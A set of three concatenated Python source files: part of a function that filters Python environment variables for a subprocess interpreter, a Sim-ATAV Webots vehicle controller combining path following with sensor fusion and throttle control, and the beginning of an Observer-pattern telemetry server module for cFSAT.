        # Target is the same interpreter (or a venv of it):
        # bring out some important variables so that they can
        # be explicitly set in macOS Terminal
        # (If they are set then it's most likely because current exe is in Thonny bundle)
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = os.environ[key]
        # never pass some variables to different interpreter
        # (even if it's venv or symlink to current one)
        if not is_same_path(target_executable, this_executable):
            for key in ["PYTHONPATH", "PYTHONHOME",
                        "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
                if key in os.environ:
                    result[key] = None
    else:
        # interpreters are not related
        # interpreter specific keys most likely would confuse other interpreter
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = None
    # some keys should be never passed
    for key in ["PYTHONSTARTUP", "PYTHONBREAKPOINT", "PYTHONDEBUG",
                "PYTHONNOUSERSITE", "PYTHONASYNCIODEBUG"]:
        if key in os.environ:
            result[key] = None
    # venv may not find (correct) Tk without assistance (eg. in Ubuntu),
    # so point it at the front-end's Tcl/Tk libraries.
    if is_venv_interpreter_of_current_interpreter(target_executable):
        try:
            if ("TCL_LIBRARY" not in os.environ
                    or "TK_LIBRARY" not in os.environ):
                result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
                result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
        except Exception:
            logging.exception("Can't compute Tcl/Tk library location")
    return result
|
automated_driving_with_fusion2_5.py | """Defines SimpleSensorFusionControl class
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import math
import numpy as np
import threading
import pickle
from Sim_ATAV.common.controller_communication_interface import ControllerCommunicationInterface
from Sim_ATAV.vehicle_control.base_controller.base_controller import BaseCarController
from Sim_ATAV.vehicle_control.controller_commons import controller_commons
from Sim_ATAV.vehicle_control.controller_commons.path_following_tools import PathFollowingTools
from Sim_ATAV.vehicle_control.controller_commons.perception.sensor_fusion.sensor_fusion_tracker \
import SensorFusionTracker
from Sim_ATAV.vehicle_control.controller_commons.planning.target_speed_planner import TargetSpeedPlanner,\
TargetSpeedData
from Sim_ATAV.vehicle_control.generic_stanley_controller.generic_stanley_controller \
import GenericStanleyController
from Sim_ATAV.vehicle_control.generic_pid_controller.generic_pid_controller import GenericPIDController
from Sim_ATAV.vehicle_control.controller_commons.visualization.camera_info_display import CameraInfoDisplay
# Webots basic world time step, in milliseconds.
WORLD_TIME_STEP_MS = 10
HAS_DEBUG_DISPLAY = True
SENSOR_TYPE = 'Actual'  # 'Actual', 'Perfect'
DEBUG_MODE = False
# Our global variables
# Open-loop throttle schedule: target_throttle[i] is applied while
# sim time (shifted by 1 s) is below target_t[i] — see run() in
# PathAndSpeedFollower.
target_throttle = [0.5, 0.55, 0.6, -0.2, 0.2, 0.2, 0.25, 0.75, 0.85, -0.2, 0.85, 0.0, 0.0, 0.9, 0.45, -0.4, -0.2, 0.85, 0.95, 0.0, 0.45, 0.5, 0.5, 0.9, 0.55, 0.0, 0.25, 0.25, 0.25, -0.4, 0.0, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2]
# Schedule switch times in seconds (same length as target_throttle).
target_t = [0.87, 1.45, 1.92, 2.38, 2.85, 3.3, 3.74, 4.14, 4.5, 4.85, 5.2, 5.54, 5.88, 6.21, 6.52, 6.85, 7.21, 7.56, 7.88, 8.19, 8.5, 8.8, 9.09, 9.37, 9.64, 9.91, 10.18, 10.45, 10.72, 11.01, 11.31, 11.61, 11.91, 12.21, 12.51, 12.81, 13.11, 13.41, 13.71, 14.01, 14.31, 14.61, 14.91, 15.21, 15.51, 15.81, 16.11, 16.41, 16.71, 17.01, 17.31, 17.61, 17.91, 18.21, 18.51, 18.81, 19.11, 19.41, 19.71, 20.01, 20.31, 20.61, 20.91, 21.21, 21.51, 21.81, 22.11, 22.41, 22.71, 23.01, 23.31, 23.61, 23.91, 24.21, 24.51, 24.81, 25.11, 25.41, 25.71]
exp_out = [[]]
# Index into the throttle/time schedule, advanced inside run().
time_index = 0
# Counter for (currently commented-out) camera image logging.
img_cnt = 1
# Collected run data; pickled to control_throttle.pkl at end of run().
data_dict = {}
inf = 1e9
def debug_print(print_str):
    """Print *print_str* (flushing stdout) only when DEBUG_MODE is on."""
    if not DEBUG_MODE:
        return
    print(print_str)
    sys.stdout.flush()
class PathAndSpeedFollower(BaseCarController):
    """PathAndSpeedFollower class is a car controller class for Webots.

    Follows a target path (delivered as supervisor messages) while tracking a
    planned target speed. Lateral control is a Stanley controller,
    longitudinal control is either a PID throttle loop or the module-level
    open-loop throttle schedule (target_throttle / target_t), depending on
    the `is_direct_speed_control` parameter.
    """

    # --- Ego vehicle / sensor geometry constants (meters unless noted) ---
    CAMERA_TO_FRONT_DISTANCE = 2.3  # 2.3 m is the distance from Prius top sensor location to the very front of the car
    LIDAR_TO_FRONT_DISTANCE = 2.3
    CAMERA_MAIN_RELATIVE_POSITION = [0.0, 1.3]
    LIDAR_MAIN_RELATIVE_POSITION = [0.0, 1.3]
    RADAR_FRONT_RELATIVE_POSITION = [0.0, 3.6]
    FRONT_TO_REAR_WHEELS_DISTANCE = 3.6  # Approximate (this is intentially longer than the actual wheel base
    # for smoother operation)
    CAMERA_LOCAL_COORDINATES = [0.0, 1.3, 1.1]
    CAMERA_X_ROT_ANGLE = -0.01
    # Rotation matrix for the camera's pitch about the x axis.
    CAMERA_LOCAL_ROTATION = np.array([[1.0, 0.0, 0.0],
                                      [0.0, math.cos(CAMERA_X_ROT_ANGLE), -math.sin(CAMERA_X_ROT_ANGLE)],
                                      [0.0, math.sin(CAMERA_X_ROT_ANGLE), math.cos(CAMERA_X_ROT_ANGLE)]])
    CAR_FRONT_TRIANGLE_LINE1_M = -192/126  # old value: -0.6 # Line 1 m for front triangle.
    CAR_FRONT_TRIANGLE_LINE1_B = 1142.9  # Old value: 526 # Line 1 b for front triangle.
    CAR_FRONT_TRIANGLE_LINE2_M = 192/126  # old value: 0.6 # Line 2 m for front triangle.
    CAR_FRONT_TRIANGLE_LINE2_B = -758.9  # Old value: -202 # Line 2 b for front triangle.
    PED_FRONT_TRIANGLE_LINE1_M = -192/204  # old value: -0.6 # Line 1 m for front triangle.
    PED_FRONT_TRIANGLE_LINE1_B = 779.3  # Old value: 526 # Line 1 b for front triangle.
    PED_FRONT_TRIANGLE_LINE2_M = 192/204  # old value: 0.6 # Line 2 m for front triangle.
    PED_FRONT_TRIANGLE_LINE2_B = -395.3  # Old value: -202 # Line 2 b for front triangle.
    # --- Sensor periods (ms) and control tuning constants ---
    CLASSIFIER_PERIOD_MS = 100
    LIDAR_PERIOD_MS = 200
    RADAR_PERIOD_MS = 200
    MIN_EMERGENCY_BRAKE_DURATION_MS = 100.0
    MEASURE_EXEC_TIME = False
    LANE_WIDTH = 3.5
    MIN_STEERING_MANEUVER_MS = 2000.0
    EMERGENCY_STEERING_TTC = 1.0
    OBJECT_TRACKER_MAX_DISTANCE = 70.0

    def __init__(self, controller_parameters):
        """Unpack the 7-tuple of string parameters and set up controllers.

        controller_parameters: (car_model, target_speed_m_s,
        is_direct_speed_control, target_lat_pos, self_vhc_id,
        slow_at_intersection, use_fusion) — all strings; booleans are
        accepted as 'True'/'true'/'yes'/'Yes'.
        """
        (car_model, target_speed_m_s, is_direct_speed_control, target_lat_pos, self_vhc_id, slow_at_intersection,
         use_fusion) = controller_parameters
        BaseCarController.__init__(self, car_model)
        self.slow_at_intersection = slow_at_intersection in ('True', 'true', 'yes', 'Yes')
        self.is_direct_speed_control = is_direct_speed_control in ('True', 'true', 'yes', 'Yes')
        self.use_fusion = use_fusion in ('True', 'true', 'yes', 'Yes')
        # Device names and handles; handles stay None until start_devices().
        self.camera_device_name = 'camera'
        self.camera = None
        self.compass_device_name = 'compass'
        self.compass = None
        self.display_device_name = 'display'
        self.display = None
        self.camera_info_display = None
        self.sensor_display_device_name = 'sensor_display'
        self.sensor_display = None
        self.sensor_info_display = None
        self.gps_device_name = 'gps'
        self.gps = None
        self.receiver_device_name = 'receiver'
        self.receiver = None
        self.emitter_device_name = 'emitter'
        self.emitter = None
        self.lidar_main_device_name = 'velodyne'  # ibeo', 'velodyne'
        self.lidar_main = None
        self.radar_front_device_name = 'radar'
        self.radar_front = None
        self.target_speed_m_s = float(target_speed_m_s)
        self.classifier = None
        self.classification_client = None
        self.obj_tracker = None
        self.ground_truth_generator = None
        self.contr_comm = ControllerCommunicationInterface()
        self.target_lat_pos = float(target_lat_pos)
        self.target_bearing = 0.0
        # Stanley controller for steering (lateral) control.
        self.lateral_controller = GenericStanleyController()
        self.lateral_controller.k = 0.5
        self.lateral_controller.k2 = 0.4
        self.lateral_controller.k3 = 1.1
        self.lateral_controller.set_output_range(-0.8, 0.8)
        # PID controller for throttle (longitudinal) control.
        self.longitudinal_controller = GenericPIDController(0.15, 0.01, 0.0)
        self.longitudinal_controller.set_integrator_value_range(-20.0, 20.0)
        self.self_vhc_id = int(self_vhc_id)
        self.path_following_tools = PathFollowingTools()
        self.self_sensor_fusion_tracker = None
        self.last_segment_ind = 0
        # Ego state estimate; filled in run() as
        # [gps_x, gps_z, speed_m_s, bearing_rad, 0.0].
        self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
        self.last_segment_ind = 0  # NOTE(review): duplicate assignment, kept as-is
        self.detour_start_time = None
        self.target_speed_planner = TargetSpeedPlanner(default_speed=self.target_speed_m_s)
        print('AutomatedDrivingControl Initialized: {}, {}'.format(car_model, self.target_speed_m_s))

    def start_devices(self):
        """Start the devices on the car and initialize objects like classifier."""
        # Start camera and the sensors:
        self.camera = self.getCamera(self.camera_device_name)
        if self.camera is not None:
            self.camera.enable(self.CLASSIFIER_PERIOD_MS)
            self.camera_info_display = CameraInfoDisplay(self.display)
        self.gps = self.getGPS(self.gps_device_name)
        if self.gps is not None:
            self.gps.enable(WORLD_TIME_STEP_MS)
        self.compass = self.getCompass(self.compass_device_name)
        if self.compass is not None:
            self.compass.enable(WORLD_TIME_STEP_MS)
        self.receiver = self.getReceiver(self.receiver_device_name)
        if self.receiver is not None:
            self.receiver.enable(WORLD_TIME_STEP_MS)
        self.emitter = self.getEmitter(self.emitter_device_name)
        # Start the car engine
        self.start_car()

    def run(self):
        """Runs the controller.

        Main simulation loop: each Webots step it (1) reads GPS/compass,
        (2) updates the ego state estimate (optionally through a UKF
        sensor-fusion tracker), (3) ingests supervisor commands (path
        points, target-speed schedule), and (4) computes and applies
        steering/throttle. On loop exit it pickles collected data.
        """
        self.start_devices()
        print("Devices Started.")
        sys.stdout.flush()

        def get_self_position():
            """Returns current self position."""
            return self.self_current_state[0:2]

        def get_self_speed_ms():
            """Returns current speed in m/s."""
            return self.self_current_state[2]

        def get_self_yaw_angle():
            """Returns self yaw angle in radians."""
            return self.self_current_state[3]

        # Internal functions to keep the code more readable:
        def read_gps_sensor(gps_device):
            """Reads GPS sensor."""
            if gps_device is not None:
                sensor_gps_speed_m_s = gps_device.getSpeed()
                sensor_gps_position_m = gps_device.getValues()
            else:
                sensor_gps_speed_m_s = 0.0
                sensor_gps_position_m = [0.0, 0.0, 0.0]
            return sensor_gps_position_m, sensor_gps_speed_m_s

        def read_compass_sensor(compass_device):
            """Reads Compass Sensor."""
            if compass_device is not None:
                sensor_compass_bearing_rad = controller_commons.get_bearing(compass_device)
            else:
                sensor_compass_bearing_rad = 0.0
            return sensor_compass_bearing_rad

        def compute_and_apply_control():
            """Computes control output using the detected objects from sensor suite.

            NOTE: reads cur_time_ms from the enclosing run() loop scope
            (defined in the while loop before this is called).
            """
            cur_position = get_self_position()
            cur_speed_ms = get_self_speed_ms()
            cur_yaw_angle = get_self_yaw_angle()
            # Compute control
            if self.path_following_tools.target_path is not None:
                # Compute distance from front wheels for smoother turns:
                temp_cur_pos = [cur_position[0] - (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.sin(cur_yaw_angle) +
                                                   cur_speed_ms * 0.2 * math.sin(cur_yaw_angle)),
                                cur_position[1] + (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.cos(cur_yaw_angle) +
                                                   cur_speed_ms * 0.2 * math.cos(cur_yaw_angle))]
                (current_segment_ind, line_segment_as_list, nearest_pos_on_path, dist_to_seg_end) = \
                    self.path_following_tools.get_current_segment(temp_cur_pos, self.last_segment_ind)
                (distance_err, angle_err) = \
                    self.path_following_tools.get_distance_and_angle_error(temp_cur_pos,
                                                                           cur_yaw_angle,
                                                                           last_segment_ind=self.last_segment_ind,
                                                                           is_detouring=False)
                self.last_segment_ind = current_segment_ind
                if len(self.path_following_tools.path_details) > current_segment_ind:
                    (next_turn_angle, travel_distance) = self.path_following_tools.path_details[current_segment_ind]
                    travel_distance += dist_to_seg_end
                else:
                    (next_turn_angle, travel_distance) = (0.0, 0.0)
            else:
                # No path: hold a target lateral position and bearing.
                current_segment_ind = -1
                angle_err = self.target_bearing - cur_yaw_angle
                # Normalize the angle error into [-pi, pi].
                while angle_err > math.pi:
                    angle_err -= 2*math.pi
                while angle_err < -math.pi:
                    angle_err += 2*math.pi
                distance_err = -(self.target_lat_pos - cur_position[0])
                (next_turn_angle, travel_distance) = (0.0, 0.0)
            current_target_speed = \
                self.target_speed_planner.get_current_target_speed(cur_time_ms=cur_time_ms,
                                                                   cur_segment_ind=current_segment_ind)
            if self.slow_at_intersection and abs(next_turn_angle) > math.pi/60 and travel_distance < 100.0:
                turn_ratio = min(1.0, abs(next_turn_angle)/(math.pi/4.0))
                max_speed_limit = 10.0 + ((1.0 - turn_ratio)*30.0)
                # decrease speed limit as we approach to the intersection.
                max_speed_limit = (max_speed_limit + (current_target_speed - max_speed_limit) *
                                   ((max(travel_distance, 10.0)-10.0)/80.0))
            else:
                max_speed_limit = current_target_speed
            control_steering = self.lateral_controller.compute(angle_err,
                                                               distance_err,
                                                               cur_speed_ms)
            # Limit steering authority as speed grows (full range near 0 m/s,
            # tight range at/above 22 m/s).
            speed_ratio = min(1.0, self.self_current_state[2]/22.0)
            max_steering = 0.1 + (1.0 - speed_ratio)*0.7
            control_steering = min(max(-max_steering, control_steering), max_steering)
            if self.is_direct_speed_control:
                # self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(10.0), angle=control_steering)
                '''
                v = 0.1
                t = 0.3
                global t1, v1, flag
                if cur_time_ms==100:
                    self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(v), angle=control_steering)
                elif cur_time_ms>=5000:
                    self.set_throttle(t)
                # if cur_time_ms%200==0:
                #     print("time: "+str(cur_time_ms)+" vel: "+str(cur_speed_ms))
                if abs(round(cur_speed_ms,0)-cur_speed_ms)<0.01:
                    t1 = cur_time_ms
                    v1 = cur_speed_ms
                    # print ("--> "+str(t1))
                if cur_time_ms-t1 in (100,200,300,400,500,600,700,800,900,1000):
                    a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
                    # print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
                '''
                # if cur_time_ms-t1 == 1000:
                #     a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
                #     print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
                if cur_time_ms<1010:
                    # First second: fixed 4 m/s speed command to get rolling.
                    x = 4.0
                    self.set_target_speed_and_angle(speed= controller_commons.speed_ms_to_kmh(x) ,angle=control_steering)
                else:
                    # After 1 s, replay the module-level open-loop throttle
                    # schedule (target_throttle indexed by target_t times).
                    global time_index
                    if(target_t[time_index] < ((cur_time_ms/1000.0) -1) ):
                        time_index = time_index + 1
                    # x2 = exp_out[time_index][0]
                    # y2 = exp_out[time_index][1]
                    inc = 0.0
                    # if(time_index>0):
                    #     t1 = exp_out[time_index-1][4]
                    #     dt = cur_time_ms/1000.0 - 3 - t1
                    #     x1 = exp_out[time_index-1][0]
                    #     u1 = exp_out[time_index-1][3]
                    #     a2 = exp_out[time_index][2]
                    #     dx = u1*dt + 0.5*a2*dt*dt
                    #     if(abs(x2-x1)==5.0):
                    #         if( (dx-0.5)/abs(x2-x1)>(cur_position[1]-x1)/(x2-x1) ):
                    #             inc = 0.05
                    #         elif( (dx+0.5)/abs(x2-x1)<(cur_position[1]-x1)/(x2-x1) ):
                    #             inc = -0.05
                    #         else:
                    #             inc = 0.0
                    # if(target_throttle[time_index])
                    self.set_throttle_and_steering_angle(target_throttle[time_index]+inc, control_steering)
                    # if cur_time_ms%100==0:
                    #     global img_cnt
                    #     img_name = "img_"+str(img_cnt)+".png"
                    #     self.camera.saveImage("../../../images/"+img_name,1)
                    #     img_cnt = img_cnt + 1
                    #     data_dict[img_name] = [cur_speed_ms,target_throttle[time_index],control_steering]
                # self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(min(max_speed_limit,
                #                                                                             current_target_speed)),
                #                                 angle=control_steering)
                if cur_time_ms%500==0:
                    print("Time: "+str(cur_time_ms)+" Agent vehicle speed: "+str(cur_speed_ms) + " pos: "+str(cur_position))
            else:
                # Closed-loop speed control through the PID throttle loop.
                control_throttle = self.longitudinal_controller.compute(min(max_speed_limit, current_target_speed)
                                                                        - cur_speed_ms)
                self.set_throttle_and_steering_angle(control_throttle, control_steering)
            if current_target_speed < 0.0:
                # Emergency / sudden braking
                self.set_brake(1.0)
                self.set_throttle(0.0)

        while self.step() >= 0:
            sim_time = self.get_sim_time()
            cur_time_ms = int(round(1000 * sim_time))
            # -------------- Read Sensors----------------
            # ************ Read GPS ************
            (sensor_gps_position_m, sensor_gps_speed_m_s) = read_gps_sensor(self.gps)
            # ************ Read Compass ************
            sensor_compass_bearing_rad = read_compass_sensor(self.compass)
            # -------------- Sensor Fusion ----------------
            # ************ Sensor Fusion for own states (GPS + Compass) ************
            if self.self_sensor_fusion_tracker is None:
                # No tracker yet: use raw sensor readings as the state.
                self.self_current_state = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
                                           sensor_compass_bearing_rad, 0.0]
                if sensor_gps_speed_m_s > 50.0 or sensor_gps_speed_m_s < -20.0:  # Filter out errors in read gps speed
                    sensor_gps_speed_m_s = 0.0
                    self.self_current_state[2] = sensor_gps_speed_m_s
                if self.use_fusion:
                    # Initiate self sensor fusion tracker
                    self.self_sensor_fusion_tracker = SensorFusionTracker(initial_state_mean=self.self_current_state,
                                                                          filter_type='ukf')
            else:
                # Feed whatever sensors are available into the tracker.
                if self.gps is not None and self.compass is not None:
                    measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
                                   sensor_compass_bearing_rad]
                    (self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
                        measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS_COMPASS)
                elif self.gps is not None:
                    measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s]
                    (self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
                        measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS)
                elif self.compass is not None:
                    measurement = [sensor_compass_bearing_rad]
                    (self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
                        measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_COMPASS)
                else:
                    self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
            # Read sensor-like information from Simulation Supervisor
            if self.receiver is not None:
                messages = self.contr_comm.receive_all_communication(self.receiver)
                command_list = self.contr_comm.extract_all_commands_from_message(messages)
                path_modified = False
                for command_item in command_list:
                    command = command_item[0]
                    if command == ControllerCommunicationInterface.SET_CONTROLLER_PARAMETERS_MESSAGE:
                        parameter = command_item[1]
                        if parameter.get_vehicle_id() == self.self_vhc_id:
                            if parameter.get_parameter_name() == 'target_position':
                                parameter_data = parameter.get_parameter_data()
                                # print(parameter_data)
                                self.path_following_tools.add_point_to_path(parameter_data)
                                path_modified = True
                            elif parameter.get_parameter_name() == 'target_speed_at_time':
                                # 1st parameter is the start time for the target speed in seconds as float.
                                # 2nd: how long will the target speed be active in seconds -1 for infinite/until next.
                                # 3rd parameter is the target speed.
                                parameter_data = parameter.get_parameter_data()
                                if parameter_data[1] < 0:
                                    target_length = math.inf
                                else:
                                    target_length = int(round(1000 * parameter_data[1]))
                                self.target_speed_planner.add_target_speed_data(
                                    TargetSpeedData(event_type='time',
                                                    start_time=int(round(1000 * parameter_data[0])),
                                                    length=target_length,
                                                    target_speed=parameter_data[2]))
                            elif parameter.get_parameter_name() == 'target_speed_at_segment':
                                # 1st parameter is the start segment index for the target speed.
                                # 2nd: how long will the target speed be active in seconds:
                                #      -1 for infinite/until next, 0 for during the segment
                                # 3rd parameter is the target speed.
                                parameter_data = parameter.get_parameter_data()
                                if parameter_data[1] < 0:
                                    target_length = -1
                                else:
                                    target_length = int(round(1000 * parameter_data[1]))
                                self.target_speed_planner.add_target_speed_data(
                                    TargetSpeedData(event_type='segment',
                                                    start_time=int(round(parameter_data[0])),
                                                    length=target_length,
                                                    target_speed=parameter_data[2]))
                if path_modified:
                    self.path_following_tools.smoothen_the_path()
                    self.path_following_tools.populate_the_path_with_details()
                    # print(self.path_following_tools.target_path)
            # ----------Dynamic Path computation starts-------------------------
            '''
            if(cur_time_ms == 10):
                cur_position = get_self_position()
                t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
                t1.start()
            global suboptimalPath
            if (cur_time_ms == 8000):
                t1.join()
                self.path_following_tools.target_path = None
                self.path_following_tools.path_details = None
                for pt in suboptimalPath:
                    self.path_following_tools.add_point_to_path(pt)
                self.path_following_tools.smoothen_the_path()
                self.path_following_tools.populate_the_path_with_details()
                cur_position = suboptimalPath[-1]
                t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
                t1.start()
            elif (cur_time_ms % 8000 == 0):
                t1.join()
                # print(suboptimalPath)
                # cur_position = get_self_position()
                # (cur_seg,line_seg,nearest_pos,dis) = self.path_following_tools.get_current_segment(cur_position,0,self.path_following_tools.target_path)
                self.path_following_tools.target_path = self.path_following_tools.future_target_path
                self.path_following_tools.path_details = self.path_following_tools.future_path_details
                cur_position = suboptimalPath[-1]
                t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
                t1.start()
            '''
            # ---------Dynamic Path computation end--------------------
            compute_and_apply_control()
        # Simulation ended: persist the collected run data.
        out_file = "../../../control_throttle.pkl"
        with open(out_file, 'wb') as handle:
            pickle.dump(data_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
        # Clean up
        del self.classifier
        del self.obj_tracker
        print("Bye!")
        sys.stdout.flush()
|
telemetry.py | """
Copyright 2022 Open STEMware Foundation
All Rights Reserved.
This program is free software; you can modify and/or redistribute it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation; version 3 with attribution addendums as found in the
LICENSE.txt
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
This program may also be used under the terms of a commercial or enterprise
edition license of cFSAT if purchased from the copyright holder.
Purpose:
Define a Telemetry interface with the main function serving as a
command line utility.
Notes:
1. The class designs are based on the Observer Design Pattern and they
also correlate with networking roles.
-----------------------------------------------------------
| Class | Design Pattern Role | Network Role |
--------------------|----------------------|---------------
| TelemetryMessage | Subject | None |
--------------------|----------------------|---------------
| TelemetryServer | Supply Subject data | Server |
--------------------|----------------------|---------------
| TelemetryObserver | Observer | Client |
-----------------------------------------------------------
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import os
import sys
import configparser
import socket
import time
import threading
import traceback
import inspect
from typing import List
from datetime import datetime
import logging
logger = logging.getLogger(__name__)
if __name__ == '__main__' or 'cfsinterface' in os.getcwd():
sys.path.append('..')
from edsmission import EdsMission
from edsmission import CfeEdsTarget
else:
from .edsmission import EdsMission
from .edsmission import CfeEdsTarget
from tools import hex_string
###############################################################################
class TelemetryMessage:
    """
    'Subject' role of the Observer design pattern for one telemetry packet
    type. Holds the most recently decoded EDS entry/object for the packet
    and a list of observers that are notified on every update. Kept
    intentionally simple; 'business' logic lives in the observers.
    """

    def __init__(self, app_name, msg_name, app_id):
        self.app_name = app_name
        self.msg_name = msg_name
        self.app_id = app_id
        self.update_time = None  # Ground time when FSW tlm received
        self.eds_entry = None
        self.eds_obj = None
        self.observers: List[TelemetryObserver] = []

    def attach(self, observer: TelemetryObserver) -> None:
        """Register *observer* for update notifications."""
        self.observers.append(observer)

    def detach(self, observer: TelemetryObserver) -> None:
        """Remove a previously attached *observer*."""
        self.observers.remove(observer)

    def get_eds_obj(self):
        """Return the latest decoded EDS object (None before first update)."""
        return self.eds_obj

    def pri_hdr(self):
        """CCSDS primary header of the latest packet."""
        return self.eds_obj.CCSDS

    def sec_hdr(self):
        """Secondary header of the latest packet."""
        return self.eds_obj.Sec

    def payload(self):
        """Payload section of the latest packet."""
        return self.eds_obj.Payload

    def update(self, eds_entry, eds_obj) -> None:
        """Store the freshly decoded packet, timestamp it, and notify
        every attached observer."""
        self.eds_entry = eds_entry
        self.eds_obj = eds_obj
        self.update_time = datetime.now()
        logger.debug("TelemetryMessage: Notifying observers...")
        for observer in self.observers:
            observer.update(self)
###############################################################################
class TelemetryObserver(ABC):
    """
    Observer-role base class notified by TelemetryMessage subjects.
    Abstract (unlike TelemetryMessage) because different observer
    scenarios — GUI versus scripting — need their own update logic.
    """

    def __init__(self, tlm_server: TelemetryServer):
        # Server the observer pulls additional context from.
        self.tlm_server = tlm_server

    @abstractmethod
    def update(self, tlm_msg: TelemetryMessage) -> None:
        """Receive a telemetry update for *tlm_msg*."""
        pass
###############################################################################
class TelemetryServer(CfeEdsTarget):
    """
    Abstract class that defines an EDS-defined telemetry server interface. It
    uses the EdsMission database for telemetry message definitions.
    Concrete child classes provide the mechanism for receiving telemetry:
    - _recv_tlm_handler() runs in a thread that ingests tlm messages
    - server_observer is a user supplied function that processes messages
      within the context of the child class's environment
    """

    def __init__(self, mission, target):
        super().__init__(mission, target, EdsMission.TELEMETRY_IF)
        self._recv_tlm_thread = None
        self.server_observer = None
        self.lookup_appid = {}  # Used 'app_name-tlm_msg_name' to retrieve app_id
        self.tlm_messages = {}  # The eds_obj in a tlm msg holds the most recent values
        # Build one TelemetryMessage per telemetry topic known to the EDS
        # database (topic_dict is populated by the CfeEdsTarget base class).
        for topic in self.topic_dict:
            if topic != EdsMission.TOPIC_TLM_TITLE_KEY:
                (app_name, tlm_msg_name) = self.parse_topic(topic)
                app_id = self.get_app_id(app_name,tlm_msg_name)
                logger.info("TelemetryServer constructor adding App: %s, Msg %s, Id: %d" % (app_name, tlm_msg_name, app_id))
                self.tlm_messages[app_id] = TelemetryMessage(app_name, tlm_msg_name, app_id)
                self.lookup_appid[self.join_app_msg(app_name, tlm_msg_name)] = app_id

    def get_tlm_param_val(self, base_object, parameter, obj_name):
        """
        Recursive function that iterates over an EDS object to locate the
        parameter and return its value.
        Inputs:
        base_object - The EDS object to iterate over
        parameter   - Name of the parameter to locate
        obj_name    - Name of EDS object currently being processed. Initially None
                      and gets filled in by the recursive calls. Assumes top-level
                      object is a container.
        Returns the parameter's value, or None if not found.
        """
        #TODO: print("\n\n***get_tlm_param_val()***")
        if obj_name is None:
            return_value = None
        # Array: recurse into each element.
        if (self.eds_mission.lib_db.IsArray(base_object)):
            #TODO: print("[[[[[[[[[[[[[Array base_object inspect = " + str(inspect.getmembers(base_object))+"\n")
            #TODO: print("[[[[[[[[[[[[[Array base_object dir = " + str(base_object())+"\n")
            #TODO: if obj_name is not None:
            #TODO:     print('array obj_name = ' + str(obj_name))
            for i in range(len(base_object)):
                return_value = self.get_tlm_param_val(base_object[i], parameter, obj_name)
                if return_value is not None:
                    return return_value
                #TODO: print("base_object[i] = " + str(base_object[i]))
        # Container: recurse into each (name, value) item.
        elif (self.eds_mission.lib_db.IsContainer(base_object)):
            #TODO: print("{{{{{{{{{{{{{Container base_object= " + str(base_object)+"\n")
            for item in base_object:
                return_value = self.get_tlm_param_val(item[1], parameter, item[0])
                if return_value is not None:
                    return return_value
        # Everything else (number, enumeration, string, etc.): leaf node —
        # match on the accumulated object name.
        else:
            #print(">>>>base_object value " + str(base_object)+"\n")
            return_value = None
            if obj_name is not None:
                #TODO: print(">>>>%s = " % obj_name)
                if obj_name == parameter:
                    #TODO: print("********* FOUND OBJECT *************")
                    return_value = base_object
        return return_value

    def get_tlm_val(self, app_name, tlm_msg_name, parameter):
        """
        Return the current value of *parameter* in the named telemetry message.
        todo: This is limited to uniquely named parameters
        """
        value = None
        app_id = self.lookup_appid[self.join_app_msg(app_name, tlm_msg_name)]
        tlm_msg = self.tlm_messages[app_id]
        #TODO: print("***tlm_msg: %s %s %s" % (tlm_msg.app_name, tlm_msg.msg_name, parameter))
        eds_obj = tlm_msg.get_eds_obj()
        if eds_obj is not None:
            value = self.get_tlm_param_val(eds_obj, parameter, None)
        #TODO: print("***value = " + str(value))
        return value

